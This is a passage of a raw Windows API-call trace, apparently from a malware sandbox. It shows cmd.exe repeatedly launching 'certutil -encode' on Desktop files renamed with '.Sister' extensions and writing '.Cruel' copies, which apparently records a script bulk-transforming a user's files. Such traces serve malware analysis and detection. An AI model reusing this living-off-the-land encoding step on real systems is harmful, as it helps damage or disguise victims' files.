lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0250.030] GetLastError () returned 0x2 [0250.030] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cf40 [0250.030] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0250.030] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0250.030] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0250.030] ??_V@YAXPEAX@Z () returned 0x1 [0250.030] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0250.031] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0250.031] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0250.031] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0250.031] GetProcessHeap () returned 0x21ed8c70000 [0250.031] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45ce0 [0250.031] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0250.032] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0250.033] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0250.034] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0250.034] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0250.034] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0250.034] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0250.034] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0250.034] GetProcessHeap () returned 0x21ed8c70000 [0250.034] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45ce0) returned 1 [0250.034] GetProcessHeap () returned 0x21ed8c70000 [0250.034] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c955e0 [0250.034] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0250.034] _get_osfhandle (_FileHandle=1) returned 0x50 [0250.034] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0250.035] _get_osfhandle (_FileHandle=0) returned 0x4c [0250.035] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0250.036] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"rJUrds91A0r_fz.png.Sister\" \"rJUrds91A0r_fz.png.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x126c, dwThreadId=0x12cc)) returned 1 [0250.048] CloseHandle (hObject=0xa4) returned 1 [0250.048] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0250.048] GetProcessHeap () returned 0x21ed8c70000 [0250.048] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0250.048] GetEnvironmentStringsW () returned 0x21ed8d44660* [0250.048] GetProcessHeap () returned 0x21ed8c70000 [0250.048] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0250.048] FreeEnvironmentStringsA (penv="=") returned 1 [0250.048] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0251.818] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0251.818] CloseHandle (hObject=0xa8) returned 1 [0251.818] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0251.818] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0251.818] GetProcessHeap () returned 0x21ed8c70000 [0251.818] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0251.819] GetEnvironmentStringsW () returned 0x21ed8d44660* [0251.819] GetProcessHeap () returned 0x21ed8c70000 [0251.819] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0251.819] FreeEnvironmentStringsA (penv="=") returned 1 [0251.819] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0251.819] GetProcessHeap () returned 0x21ed8c70000 [0251.819] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0251.819] GetEnvironmentStringsW () returned 0x21ed8d44660* [0251.819] GetProcessHeap () returned 0x21ed8c70000 [0251.819] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0251.819] FreeEnvironmentStringsA (penv="=") returned 1 [0251.819] GetProcessHeap () returned 0x21ed8c70000 [0251.819] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c955e0) returned 1 [0251.819] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0251.819] ??_V@YAXPEAX@Z () returned 0x1 [0251.820] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211c8ad0, ftCreationTime.dwHighDateTime=0x1d5e77b, ftLastAccessTime.dwLowDateTime=0x10340cc0, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x10340cc0, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0xe565, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="sOzzAEtr.flv.Sister", cAlternateFileName="")) returned 1 [0251.820] GetProcessHeap () returned 0x21ed8c70000 [0251.820] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8070, Size=0x514) returned 0x21ed8cc8070 [0251.820] GetProcessHeap () returned 0x21ed8c70000 [0251.820] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc8070) returned 0x514 [0251.820] GetProcessHeap () returned 0x21ed8c70000 [0251.820] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a470 [0251.820] GetProcessHeap () returned 0x21ed8c70000 [0251.820] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a470, Size=0x58) returned 0x21ed8d6a470 [0251.820] GetProcessHeap () returned 0x21ed8c70000 [0251.820] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a470) returned 0x58 [0251.820] GetProcessHeap () returned 0x21ed8c70000 [0251.820] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a4e0 [0251.820] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0251.820] GetProcessHeap () returned 0x21ed8c70000 [0251.821] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8b10 [0251.821] ??_V@YAXPEAX@Z () returned 0x1 [0251.821] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0251.821] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0251.821] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0251.821] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0251.821] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0251.822] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc042bc2d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc042bc2d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0251.822] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0251.822] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\sOzzAEtr.flv.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211c8ad0, ftCreationTime.dwHighDateTime=0x1d5e77b, ftLastAccessTime.dwLowDateTime=0x10340cc0, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x10340cc0, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0xe565, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="sOzzAEtr.flv.Sister", cAlternateFileName="SOZZAE~1.SIS")) returned 0x21ed8c7d0c0 [0251.822] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0251.822] _wcsnicmp (_String1="SOZZAE~1.SIS", _String2="sOzzAEtr.flv.Sister", _MaxCount=0x13) returned 10 [0251.822] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0251.822] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0251.822] GetProcessHeap () returned 0x21ed8c70000 [0251.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed8cc8d50 [0251.823] ??_V@YAXPEAX@Z () returned 0x1 [0251.823] ??_V@YAXPEAX@Z () returned 0x1 [0251.823] GetProcessHeap () returned 0x21ed8c70000 [0251.823] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a4e0, Size=0x1b0) returned 0x21ed8d6a4e0 [0251.823] GetProcessHeap () returned 0x21ed8c70000 [0251.823] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a4e0) returned 0x1b0 [0251.823] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0251.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0251.823] GetFileType (hFile=0x50) returned 0x2 [0251.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0251.823] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0251.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0251.947] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0252.044] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0252.044] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0252.044] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0252.044] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0252.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.044] GetFileType (hFile=0x50) returned 0x2 [0252.044] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0252.044] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0252.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.123] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0252.236] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.236] GetFileType (hFile=0x50) returned 0x2 [0252.236] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0252.236] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0252.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.320] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d6a480*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d6a480*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0252.548] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.flv.Cruel\" ") returned 52 [0252.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.548] GetFileType (hFile=0x50) returned 0x2 [0252.548] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0252.548] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0252.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.630] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x34) returned 1 [0252.758] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0252.758] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.759] GetFileType (hFile=0x50) returned 0x2 [0252.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0252.759] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0252.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0252.827] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0252.908] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0252.979] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0252.979] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0252.980] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0252.980] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0252.980] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0252.980] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0252.980] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0252.980] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0252.980] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0252.980] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0252.980] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0252.980] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0252.980] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0252.980] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0252.980] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0252.980] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0252.980] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0252.980] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0252.980] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0252.980] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0252.980] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0252.980] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0252.981] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0252.981] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0252.981] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0252.981] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0252.981] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0252.981] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0252.981] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0252.981] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0252.981] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0252.981] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0252.981] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0252.981] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0252.981] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0252.981] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0252.981] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0252.981] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0252.981] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0252.981] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0252.981] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0252.981] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0252.981] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0252.981] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0252.981] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0252.981] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0252.981] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0252.981] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0252.982] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0252.982] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0252.982] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0252.982] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0252.982] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0252.982] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0252.982] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0252.982] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0252.982] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0252.982] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0252.982] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0252.982] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0252.982] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0252.982] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0252.982] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0252.982] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0252.982] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0252.982] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0252.982] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0252.982] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0252.982] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0252.982] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0252.982] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0252.982] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0252.982] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0252.982] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0252.983] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0252.983] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0252.983] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0252.983] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0252.983] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0252.983] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0252.983] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0252.983] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0252.983] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0252.983] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0252.983] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0252.983] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0252.983] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0252.983] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0252.983] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0252.983] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0252.983] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0252.983] ??_V@YAXPEAX@Z () returned 0x1 [0252.983] GetProcessHeap () returned 0x21ed8c70000 [0252.983] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9351570 [0252.984] GetProcessHeap () returned 0x21ed8c70000 [0252.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8a) returned 0x21ed8d65e30 [0252.984] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0252.984] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0252.984] ??_V@YAXPEAX@Z () returned 